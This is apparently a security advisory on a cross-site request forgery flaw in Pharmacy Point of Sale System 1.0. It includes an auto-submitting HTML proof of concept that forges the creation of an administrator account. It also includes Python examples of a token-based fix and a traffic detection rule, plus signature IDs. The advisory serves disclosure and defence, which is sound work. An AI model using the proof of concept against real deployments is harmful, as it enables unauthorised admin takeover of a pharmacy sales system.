Pharmacy Point of Sale System 1.0 'New Admin' Cross-Site Request Forgery



Application Details

Pharmacy Point of Sale System is a web-based application that handles sales and day-to-day customer transactions and tracks stock levels for all products sold.


Vulnerability

Pharmacy Point of Sale System is vulnerable to cross-site request forgery because the user-management action (Actions.php?a=save_user) accepts state-changing POST requests without an anti-CSRF token or any other check that the request was submitted from the application's own pages.


Identification

By persuading an authenticated administrator to visit a malicious web site, a remote attacker can make the victim's browser submit a forged POST request to Actions.php?a=save_user that creates a new administrative account (type=1) with a username of the attacker's choosing. The request itself is well formed: the browser attaches the victim's session cookie automatically, so the application treats it as an ordinary admin action. The proof of concept below, generated with Burp Suite, submits the fields id, fullname, username and type and auto-submits the form as soon as the page loads; the history.pushState call only hides the page's real URL from the address bar.


<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pharmacy/Actions.php?a=save_user" method="POST">
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="fullname" value="Mrt" />
      <input type="hidden" name="username" value="NewAdmin" />
      <input type="hidden" name="type" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
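As an added example, not code from the advisory or from the PHP application it describes, the following Python models the check that is missing: a per-session synchronizer token that the legitimate "new user" form must echo back, with an Origin/Referer host check as defence in depth. The session dict, the users list and the expected host of localhost are assumptions standing in for $_SESSION, the user table and the deployment's hostname; POC_FORM holds the fields the PoC above submits. In the application itself the same checks would be written against $_SESSION and hash_equals().

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Added example, not code from the advisory or from the PHP application it describes.
# The session dict, users list and expected host are assumptions standing in for
# $_SESSION, the user table and the deployment's hostname.

# The fields the advisory's PoC page submits to Actions.php?a=save_user.
POC_FORM = {"id": "", "fullname": "Mrt", "username": "NewAdmin", "type": "1"}


def issue_csrf_token(session):
    """Mint a per-session synchronizer token. The legitimate 'new user' page
    embeds it as a hidden field; a page on another origin cannot read it."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def save_user_vulnerable(session, form, users):
    """Models the behaviour the advisory describes: the handler trusts any POST
    that arrives with the victim's session cookie, so the forged request succeeds."""
    users.append({"username": form["username"], "type": form["type"]})
    return True


def _same_site(headers, expected_host):
    """Defence in depth: if the browser sent Origin (or, failing that, Referer),
    its host must be ours. A request with neither header is tolerated here
    because some clients and referrer policies strip them (assumed policy)."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).netloc.lower() == expected_host.lower()
    return True


def save_user_hardened(session, form, headers, users, expected_host="localhost"):
    """The same action with the missing check: the token in the form must match
    the one held in the server-side session (constant-time compare) and the
    request must not visibly come from another origin. True only if created."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False  # the PoC has no token to send, so it is rejected here
    if not _same_site(headers, expected_host):
        return False
    users.append({"username": form["username"], "type": form["type"]})
    return True


if __name__ == "__main__":
    # Replay the PoC against both handlers using a constructed logged-in session.
    session, users = {}, []
    print("vulnerable:", save_user_vulnerable(session, POC_FORM, users), users)
    users = []
    forged_headers = {"Origin": "http://attacker.example"}
    print("hardened, forged:", save_user_hardened(session, POC_FORM, forged_headers, users))
    token = issue_csrf_token(session)
    legit_form = dict(POC_FORM, csrf_token=token)
    print("hardened, legit:", save_user_hardened(session, legit_form, {"Origin": "http://localhost"}, users), users)
```

Authentication alone does not help here: the victim is logged in and the browser attaches the session cookie to the forged request. What separates the two requests is something the attacker's page cannot read or forge, namely the token stored server-side and embedded only in the application's own form.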


Detection

The PoC traffic was captured into traffic files and paired with matching rules: a POST to Actions.php carrying a=save_user in the query string and type=1 in the body is an attempt to create an admin user, which is what the rules detect. A network signature sees the same request whether it is forged or legitimate; the Origin and Referer headers, when the browser sends them, are what distinguish a submission from another site from one made on the application's own user page, so they are worth matching on or at least carrying in the alert context.
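The following is an added Python example, not Idappcom's signature or traffic file, showing what such a rule has to match and the one thing it can use to tell a forged submission from an administrator's own. It parses a raw HTTP request as a traffic file would carry it, flags a POST to Actions.php with a=save_user and type=1, and marks it cross-site when the Origin (or Referer) host differs from the Host header. Both sample requests are constructed; attacker.example, the cookie value and the legitimate page path users.php are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

# Added example, not Idappcom's signature or traffic file. The requests below are
# constructed; attacker.example, the cookie value and the page path are assumptions.


def build_request(target, headers, body):
    """Assemble a raw HTTP/1.1 POST the way a traffic file would carry it."""
    lines = [f"POST {target} HTTP/1.1"]
    lines += [f"{k}: {v}" for k, v in headers.items()]
    lines.append("Content-Type: application/x-www-form-urlencoded")
    lines.append(f"Content-Length: {len(body)}")
    return "\r\n".join(lines) + "\r\n\r\n" + body


# The body the advisory's PoC form produces.
POC_BODY = "id=&fullname=Mrt&username=NewAdmin&type=1"

# What the PoC page makes the victim's browser send: the session cookie is
# attached, but Origin and Referer point at the attacker's site.
FORGED_REQUEST = build_request(
    "/pharmacy/Actions.php?a=save_user",
    {"Host": "localhost", "Origin": "http://attacker.example",
     "Referer": "http://attacker.example/", "Cookie": "PHPSESSID=constructed"},
    POC_BODY,
)

# The same action taken by an administrator from the application's own page.
LEGIT_REQUEST = build_request(
    "/pharmacy/Actions.php?a=save_user",
    {"Host": "localhost", "Origin": "http://localhost",
     "Referer": "http://localhost/pharmacy/users.php", "Cookie": "PHPSESSID=constructed"},
    POC_BODY,
)


def parse_http_request(raw):
    """Split a raw request into method, target, lower-cased header map and body."""
    head, _, rest = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", len(rest)))
    return method, target, headers, rest[:length]


def classify_save_user(raw):
    """Return None unless the request tries to create an admin user through
    Actions.php?a=save_user with type=1; otherwise return the username and
    whether the submitting page was on another site (the CSRF indicator)."""
    method, target, headers, body = parse_http_request(raw)
    url = urlsplit(target)
    if method != "POST" or not url.path.endswith("/Actions.php"):
        return None
    if parse_qs(url.query).get("a") != ["save_user"]:
        return None
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if form.get("type") != "1":  # type=1 is the admin account type used by the PoC
        return None
    host = headers.get("host", "").lower()
    source = headers.get("origin") or headers.get("referer")
    cross_site = bool(source) and urlsplit(source).netloc.lower() != host
    return {"username": form.get("username"), "cross_site": cross_site}


if __name__ == "__main__":
    for label, raw in (("forged", FORGED_REQUEST), ("legitimate", LEGIT_REQUEST)):
        print(label, classify_save_user(raw))
```

The limits of this on the wire are the same limits a signature has: over HTTPS the request is only visible where traffic is decrypted, and a Referrer-Policy of no-referrer or a browser that omits Origin leaves nothing to compare, in which case the rule can only report that an admin account was created, not that it was forged.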


Coverage

Idappcom has created signatures 8021954 and 8021955 along with traffic files.


References

Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery - Exploit Database

Pharmacy Point of Sale System 1.0 Cross-Site Request Forgery - Packet Storm Security


Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, try our Traffic IQ software, which can test your defences against it and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional